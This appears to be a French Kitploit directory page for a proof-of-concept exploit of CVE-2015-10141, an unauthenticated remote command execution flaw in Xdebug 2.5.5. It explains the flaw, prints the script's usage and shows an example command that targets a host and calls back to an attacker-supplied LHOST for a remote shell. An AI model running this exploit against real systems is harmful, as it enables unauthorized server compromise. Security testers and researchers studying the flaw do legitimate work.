Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2015-10141 — POC exploit for CVE-2015-10141 | Kitploit
Outils/GitHubGitHub/d3ext/cve-2015-10141
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubd3ext/cve-2015-10141

CVE-2015-10141

POC exploit for CVE-2015-10141

Voir le dépôt
319il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2015-10141

root@kitploit:~
# Exploit Title: xdebug Unauthenticated Command Execution
# Exploit Author: D3Ext
# Vendor Homepage: https://xdebug.org/
# Sofware Link: https://pecl.php.net/package/xdebug/2.5.5/windows
# Version: 2.5.5
# Tested on: Kali Linux 2025
# CVE: CVE-2015-10141

Explication

Une vulnérabilité d'injection de commandes OS non authentifiée existe dans Xdebug versions 2.5.5 et antérieures, une extension de débogage PHP. Lorsque le débogage à distance est activé, Xdebug écoute sur le port 9000 et accepte les commandes du protocole de débogage sans authentification. Un attaquant peut envoyer une commande eval conçue via cette interface pour exécuter du code PHP arbitraire, ce qui peut invoquer des fonctions système telles que system() ou passthru(). Cela entraîne une compromission totale de l'hôte sous les privilèges de l'utilisateur du serveur web.

Utilisation

root@kitploit:~
usage: CVE-2015-10141.py [-h] -u URL -l LHOST

CVE-2015-10141 - xdebug v2.5.5 RCE Exploit

options:
  -h, --help         show this help message and exit
  -u, --url URL      URL of the target
  -l, --lhost LHOST  LHOST to trigger the RCE

Exécutez simplement l'exploit et fournissez une URL valide avec un fichier PHP comme index.php ainsi que l'hôte local. Ensuite, l'exploit tentera d'établir un pseudo-terminal qui vous permettra d'exécuter des commandes à distance.

root@kitploit:~
python3 exploit.py -u http://10.10.10.83/index.php -l 10.10.16.3

(Prenez en compte que dans certains cas, la sortie ne sera pas du tout reflétée et vous ne verrez que la première ligne de la commande exécutée ; ce n'est pas un problème du script, la vulnérabilité fonctionne ainsi.)

Références

root@kitploit:~
https://github.com/advisories/GHSA-267w-63f8-m896
https://www.exploit-db.com/exploits/44568
https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/
https://nvd.nist.gov/vuln/detail/CVE-2015-10141
https://www.wiz.io/vulnerability-database/cve/cve-2015-10141
https://feedly.com/cve/CVE-2015-10141
https://www.tenable.com/plugins/nessus/112210

Licence

Ce projet est sous licence MIT

Copyright © 2025, D3Ext

Télécharger l’outil